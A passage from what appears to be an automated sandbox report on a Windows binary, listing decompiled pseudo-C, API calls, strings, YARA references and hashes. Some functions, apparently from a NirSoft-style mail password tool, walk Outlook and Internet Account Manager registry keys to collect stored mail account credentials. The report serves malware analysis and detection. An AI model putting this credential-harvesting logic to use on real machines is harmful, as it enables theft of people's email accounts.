                                                                                                                                                                  0x004118af
                                                                                                                                                                  0x004118b2
                                                                                                                                                                  0x004118b6
                                                                                                                                                                  0x004118b8
                                                                                                                                                                  0x004118bf
                                                                                                                                                                  0x004118c6
                                                                                                                                                                  0x004118c9
                                                                                                                                                                  0x004118c9
                                                                                                                                                                  0x004118b8
                                                                                                                                                                  0x004118dc
                                                                                                                                                                  0x004118e3
                                                                                                                                                                  0x004118eb
                                                                                                                                                                  0x004118f3
                                                                                                                                                                  0x004118f9
                                                                                                                                                                  0x00411905
                                                                                                                                                                  0x00411914
                                                                                                                                                                  0x00411926
                                                                                                                                                                  0x0041193e
                                                                                                                                                                  0x0041193f
                                                                                                                                                                  0x0041193f
                                                                                                                                                                  0x00411714
                                                                                                                                                                  0x00411947

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004116E3
                                                                                                                                                                    • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                                                                                                                                                                  • strlen.MSVCRT ref: 004116FF
                                                                                                                                                                  • memset.MSVCRT ref: 00411739
                                                                                                                                                                  • memset.MSVCRT ref: 0041174D
                                                                                                                                                                  • memset.MSVCRT ref: 00411761
                                                                                                                                                                  • memset.MSVCRT ref: 00411787
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                                                                                                                                                                    • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                                                                                                                                                                  • memcpy.MSVCRT ref: 004117BE
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                                                                                                                                                                    • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                                                                                                                                                                    • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                                                                                                                                                                  • memcpy.MSVCRT ref: 004117FA
                                                                                                                                                                  • memcpy.MSVCRT ref: 0041180C
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 004118E3
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411914
                                                                                                                                                                  • memcpy.MSVCRT ref: 00411926
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset$strlen$strcpy
                                                                                                                                                                  • String ID: salu
                                                                                                                                                                  • API String ID: 2660478486-4177317985
                                                                                                                                                                  • Opcode ID: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                                                                                                                                                                  • Instruction ID: f1a42822f8ef7e9ef4ab6207fa972415b32dae4f069819a41f3cbfc12677ad8b
                                                                                                                                                                  • Opcode Fuzzy Hash: ecc3e5fc33f7c09d638776c6de414f29c6625a71b5aa4d45c2c235c3495687e5
                                                                                                                                                                  • Instruction Fuzzy Hash: 84717E7290011DAACB10EB95CC81ADE77BDFF08348F1445BAF648E7151DB749B888F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404292, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404292(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
				intOrPtr _v8;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				wchar_t* _t23;
				char* _t41;
				wchar_t** _t59;
				void* _t76;

				_t76 = __fp0;
				_t59 = _a4;
				_t23 =  *_t59;
				_v8 = __ecx;
				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
					E00402197( &_v940);
					_v800 = 7;
					_v412 = 3;
					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
					strcpy( &_v928,  &_v408);
					strcpy( &_v796,  &_v408);
					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
						sprintf( &_v796, "%s@gmail.com",  &_v408);
					}
					_t41 = strchr( &_v928, 0x40);
					if(_t41 != 0) {
						 *_t41 = 0;
					}
					E004023C6( &_v940, _t76, _v8 + 0xfffff788);
				}
				return 1;
			}















                                                                                                                                                                  0x00404292
                                                                                                                                                                  0x0040429d
                                                                                                                                                                  0x004042a0
                                                                                                                                                                  0x004042a6
                                                                                                                                                                  0x004042a9
                                                                                                                                                                  0x004042dd
                                                                                                                                                                  0x004042f8
                                                                                                                                                                  0x00404304
                                                                                                                                                                  0x0040430e
                                                                                                                                                                  0x00404322
                                                                                                                                                                  0x00404332
                                                                                                                                                                  0x00404345
                                                                                                                                                                  0x0040435e
                                                                                                                                                                  0x00404388
                                                                                                                                                                  0x0040438d
                                                                                                                                                                  0x00404399
                                                                                                                                                                  0x004043a2
                                                                                                                                                                  0x004043a4
                                                                                                                                                                  0x004043a4
                                                                                                                                                                  0x004043b5
                                                                                                                                                                  0x004043b5
                                                                                                                                                                  0x004043c0

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcsstr.MSVCRT ref: 004042C7
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 0040430E
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404322
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00404332
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00404345
                                                                                                                                                                  • strchr.MSVCRT ref: 00404353
                                                                                                                                                                  • strlen.MSVCRT ref: 00404367
                                                                                                                                                                  • sprintf.MSVCRT ref: 00404388
                                                                                                                                                                  • strchr.MSVCRT ref: 00404399
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                                                                                                                  • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                  • API String ID: 1359934567-4070641962
                                                                                                                                                                  • Opcode ID: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                                                                                                                                                                  • Instruction ID: 1c9d9e350e6bfb7db098629835421676e34b4d03cf30903a353d84187424ac51
                                                                                                                                                                  • Opcode Fuzzy Hash: a3cc65550b97ecd1211b0065db1cf81a5f65b27e49af438170d461af2d2a7879
                                                                                                                                                                  • Instruction Fuzzy Hash: AE3166B2904219AFDB11DB91DD81FDBB7ACAB14314F1001A7B708E2180D678AF958A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004083E4, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                  			E004083E4(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
				void _v4103;
				char _v4104;
				int _t21;
				int _t28;
				void* _t35;

				_t35 = __eflags;
				E00412360(0x1004, __ecx);
				strcpy(0x4181b8, _a8);
				strcpy(0x4182c0, "general");
				E00407FBF(_t35, "TranslatorName", 0x41344f);
				E00407FBF(_t35, "TranslatorURL", 0x41344f);
				EnumResourceNamesA(_a4, 4, E0040820D, 0);
				EnumResourceNamesA(_a4, 5, E0040820D, 0);
				strcpy(0x4182c0, "strings");
				_t28 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
					if(_t21 > 0) {
						_t21 = E0040802D(_t28,  &_v4104);
					}
					_t28 = _t28 + 1;
				} while (_t28 <= 0xffff);
				 *0x4181b8 = 0;
				return _t21;
			}








                                                                                                                                                                  0x004083e4
                                                                                                                                                                  0x004083ec
                                                                                                                                                                  0x004083fc
                                                                                                                                                                  0x0040840c
                                                                                                                                                                  0x0040841c
                                                                                                                                                                  0x00408427
                                                                                                                                                                  0x00408442
                                                                                                                                                                  0x0040844c
                                                                                                                                                                  0x00408454
                                                                                                                                                                  0x0040845f
                                                                                                                                                                  0x00408469
                                                                                                                                                                  0x00408470
                                                                                                                                                                  0x00408478
                                                                                                                                                                  0x00408484
                                                                                                                                                                  0x0040848c
                                                                                                                                                                  0x00408496
                                                                                                                                                                  0x0040849c
                                                                                                                                                                  0x0040849d
                                                                                                                                                                  0x0040849e
                                                                                                                                                                  0x004084a8
                                                                                                                                                                  0x004084b1

                                                                                                                                                                  APIs
                                                                                                                                                                  • strcpy.MSVCRT(004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 004083FC
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,?,?,00408515,00000000,?,00000000,00000104,?), ref: 0040840C
                                                                                                                                                                    • Part of subcall function 00407FBF: memset.MSVCRT ref: 00407FE4
                                                                                                                                                                    • Part of subcall function 00407FBF: GetPrivateProfileStringA.KERNEL32(004182C0,00000104,0041344F,?,00001000,004181B8), ref: 00408008
                                                                                                                                                                    • Part of subcall function 00407FBF: WritePrivateProfileStringA.KERNEL32(004182C0,?,?,004181B8), ref: 0040801F
                                                                                                                                                                  • EnumResourceNamesA.KERNEL32 ref: 00408442
                                                                                                                                                                  • EnumResourceNamesA.KERNEL32 ref: 0040844C
                                                                                                                                                                  • strcpy.MSVCRT(004182C0,strings,?,00408515,00000000,?,00000000,00000104,?), ref: 00408454
                                                                                                                                                                  • memset.MSVCRT ref: 00408470
                                                                                                                                                                  • LoadStringA.USER32 ref: 00408484
                                                                                                                                                                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Stringstrcpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                  • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                  • API String ID: 1060401815-3647959541
                                                                                                                                                                  • Opcode ID: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                  • Instruction ID: 8ec8ecd25de3f69567fa6951aee80203735b19b36847dd402765e4c6546554b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 98af3922fbcbedabf84b8f8c529632f1206592c49a551a07e3fdb0f782d43fb9
                                                                                                                                                                  • Instruction Fuzzy Hash: 201108319401543AD73167569D0AFDB3E6CDB85B94F1040BFBA48A61C1D9BC59C086BC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B656, Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E0040B656(intOrPtr __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t51;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr _t93;
				signed char _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				void* _t104;

				_t95 = __ecx;
				_t100 = _a4;
				_t104 = _t100 - 0x402;
				_t103 = __ecx;
				if(_t104 > 0) {
					_t51 = _t100 - 0x415;
					__eflags = _t51;
					if(_t51 == 0) {
						E0040A632(__ecx);
						L22:
						__eflags = 0;
						E0040A3E9(0, _t95, _t103, 0);
						L23:
						if(_t100 ==  *((intOrPtr*)(_t103 + 0x374))) {
							_t92 = _a12;
							_t97 =  *(_a12 + 0xc);
							_t56 =  *((intOrPtr*)(_t103 + 0x370));
							if((_t97 & 0x00000008) == 0) {
								__eflags = _t97 & 0x00000040;
								if((_t97 & 0x00000040) != 0) {
									 *0x4181ac =  *0x4181ac & 0x00000000;
									__eflags =  *0x4181ac;
									SetFocus( *(_t56 + 0x184));
								}
							} else {
								E00409EE8(_t56, _t92);
							}
						}
						return E00401939(_t103, _t100, _a8, _a12);
					}
					_t59 = _t51 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x5c))();
						_t95 =  *((intOrPtr*)(__ecx + 0x370));
						_push(0);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x74))();
						E0040A5A1(__ecx);
						SetFocus( *( *((intOrPtr*)(__ecx + 0x370)) + 0x184));
						goto L22;
					}
					__eflags = _t59 == 6;
					if(_t59 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t104 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A5A1(__ecx);
					goto L22;
				}
				if(_t100 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t103 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t100 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x417b94, 0x67));
					return 1;
				}
				if(_t100 == 0x2b) {
					_t93 = _a12;
					__eflags =  *((intOrPtr*)(_t93 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t93 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t93 + 0x18), 1);
						SetTextColor( *(_t93 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t93 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t102 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t102 + 0x18), __ecx + 0x158, 0xffffffff, _t102 + 0x1c, 4,  &_v28);
						SelectObject( *(_t102 + 0x18), _v8);
						_t100 = _a4;
					}
				} else {
					if(_t100 == 0x7b) {
						_t99 = _a8;
						if(_a8 ==  *( *((intOrPtr*)(__ecx + 0x370)) + 0x184)) {
							E0040B48C(__ecx, _t99);
						}
					}
				}
				goto L23;
			}


















                                                                                                                                                                  0x0040b656
                                                                                                                                                                  0x0040b65f
                                                                                                                                                                  0x0040b667
                                                                                                                                                                  0x0040b669
                                                                                                                                                                  0x0040b66b
                                                                                                                                                                  0x0040b7a3
                                                                                                                                                                  0x0040b7a3
                                                                                                                                                                  0x0040b7a8
                                                                                                                                                                  0x0040b7f3
                                                                                                                                                                  0x0040b7f8
                                                                                                                                                                  0x0040b7f8
                                                                                                                                                                  0x0040b7fa
                                                                                                                                                                  0x0040b7ff
                                                                                                                                                                  0x0040b805
                                                                                                                                                                  0x0040b807
                                                                                                                                                                  0x0040b80a
                                                                                                                                                                  0x0040b810
                                                                                                                                                                  0x0040b816
                                                                                                                                                                  0x0040b81f
                                                                                                                                                                  0x0040b822
                                                                                                                                                                  0x0040b82a
                                                                                                                                                                  0x0040b82a
                                                                                                                                                                  0x0040b831
                                                                                                                                                                  0x0040b831
                                                                                                                                                                  0x0040b818
                                                                                                                                                                  0x0040b818
                                                                                                                                                                  0x0040b818
                                                                                                                                                                  0x0040b816
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b840
                                                                                                                                                                  0x0040b7aa
                                                                                                                                                                  0x0040b7aa
                                                                                                                                                                  0x0040b7ab
                                                                                                                                                                  0x0040b7c8
                                                                                                                                                                  0x0040b7cb
                                                                                                                                                                  0x0040b7d3
                                                                                                                                                                  0x0040b7d5
                                                                                                                                                                  0x0040b7d8
                                                                                                                                                                  0x0040b7e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b7e9
                                                                                                                                                                  0x0040b7ad
                                                                                                                                                                  0x0040b7b0
                                                                                                                                                                  0x0040b7b8
                                                                                                                                                                  0x0040b7b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b7b0
                                                                                                                                                                  0x0040b671
                                                                                                                                                                  0x0040b793
                                                                                                                                                                  0x0040b79a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b79a
                                                                                                                                                                  0x0040b67a
                                                                                                                                                                  0x0040b76b
                                                                                                                                                                  0x0040b76e
                                                                                                                                                                  0x0040b78b
                                                                                                                                                                  0x0040b770
                                                                                                                                                                  0x0040b77d
                                                                                                                                                                  0x0040b77d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b76e
                                                                                                                                                                  0x0040b683
                                                                                                                                                                  0x0040b740
                                                                                                                                                                  0x0040b746
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b75b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040b763
                                                                                                                                                                  0x0040b68c
                                                                                                                                                                  0x0040b6b8
                                                                                                                                                                  0x0040b6be
                                                                                                                                                                  0x0040b6c4
                                                                                                                                                                  0x0040b6cf
                                                                                                                                                                  0x0040b6dd
                                                                                                                                                                  0x0040b6f4
                                                                                                                                                                  0x0040b6fc
                                                                                                                                                                  0x0040b6fd
                                                                                                                                                                  0x0040b6fe
                                                                                                                                                                  0x0040b6ff
                                                                                                                                                                  0x0040b700
                                                                                                                                                                  0x0040b719
                                                                                                                                                                  0x0040b720
                                                                                                                                                                  0x0040b727
                                                                                                                                                                  0x0040b733
                                                                                                                                                                  0x0040b735
                                                                                                                                                                  0x0040b735
                                                                                                                                                                  0x0040b68e
                                                                                                                                                                  0x0040b691
                                                                                                                                                                  0x0040b69d
                                                                                                                                                                  0x0040b6a6
                                                                                                                                                                  0x0040b6ae
                                                                                                                                                                  0x0040b6ae
                                                                                                                                                                  0x0040b6a6
                                                                                                                                                                  0x0040b691
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040B6CF
                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040B6DD
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040B6F2
                                                                                                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B727
                                                                                                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040B733
                                                                                                                                                                    • Part of subcall function 0040B48C: GetCursorPos.USER32(?), ref: 0040B499
                                                                                                                                                                    • Part of subcall function 0040B48C: GetSubMenu.USER32(?,00000000), ref: 0040B4A7
                                                                                                                                                                    • Part of subcall function 0040B48C: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B4D4
                                                                                                                                                                  • LoadCursorA.USER32 ref: 0040B754
                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040B75B
                                                                                                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B77D
                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040B7B8
                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040B831
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1416211542-0
                                                                                                                                                                  • Opcode ID: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
                                                                                                                                                                  • Instruction ID: bf574778d17b78baaeffb7f566a8ea64d240ccb0deb227a445330b453fade6b9
                                                                                                                                                                  • Opcode Fuzzy Hash: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
                                                                                                                                                                  • Instruction Fuzzy Hash: 4A519271100605EFCB15EF69CC88AEA7BA5FF44301F10443AF615AB2A1CB38AD51DB9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403E97, Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 98stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 81%
                                                                                                                                                                  			E00403E97(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E00412360(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405F07(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x418308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x418308);
					_t71 = _t71 + 0xc;
				}
				if( *0x418304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405F07(_a4,  &_v4172);
				_push(0x413450);
				_t55 = 6;
				_push(E00407A69(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405F07(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E00409959(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                                                                                                                                  0x00403e97
                                                                                                                                                                  0x00403e9f
                                                                                                                                                                  0x00403eaf
                                                                                                                                                                  0x00403eb1
                                                                                                                                                                  0x00403eb4
                                                                                                                                                                  0x00403ec9
                                                                                                                                                                  0x00403ecf
                                                                                                                                                                  0x00403edd
                                                                                                                                                                  0x00403ee3
                                                                                                                                                                  0x00403ef1
                                                                                                                                                                  0x00403ef7
                                                                                                                                                                  0x00403efc
                                                                                                                                                                  0x00403f05
                                                                                                                                                                  0x00403f18
                                                                                                                                                                  0x00403f1d
                                                                                                                                                                  0x00403f1d
                                                                                                                                                                  0x00403f26
                                                                                                                                                                  0x00403f34
                                                                                                                                                                  0x00403f3a
                                                                                                                                                                  0x00403f3f
                                                                                                                                                                  0x00403f44
                                                                                                                                                                  0x00403f45
                                                                                                                                                                  0x00403f4e
                                                                                                                                                                  0x00403f6a
                                                                                                                                                                  0x00403f6b
                                                                                                                                                                  0x00403f7a
                                                                                                                                                                  0x00403f82
                                                                                                                                                                  0x00403f89
                                                                                                                                                                  0x00403f8f
                                                                                                                                                                  0x00403f9c
                                                                                                                                                                  0x00403fab
                                                                                                                                                                  0x00403fb3
                                                                                                                                                                  0x00403fb7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00403fbf
                                                                                                                                                                  0x00403fc8

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
                                                                                                                                                                  • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                  • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                  • memset.MSVCRT ref: 00403EF7
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F18
                                                                                                                                                                  • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F34
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F6B
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403F9C
                                                                                                                                                                  Strings
                                                                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00403F2E
                                                                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F96
                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F46
                                                                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F12
                                                                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                  • API String ID: 1043021993-1670831295
                                                                                                                                                                  • Opcode ID: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                                                                                                                                                                  • Instruction ID: 99203b830fad9dc7343b4b85adec4cad5e30f503418e1d4ebc977d79dce285bf
                                                                                                                                                                  • Opcode Fuzzy Hash: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                                                                                                                                                                  • Instruction Fuzzy Hash: F13166B2D00119AEDB54EB95DC41EDF7BACEB08304F1441ABB608E3141DA786FD48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402C1E, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00402C1E(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040F1B0(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040F276(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040F232(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040F1B0(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402B92(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040F1B0(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402B92(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
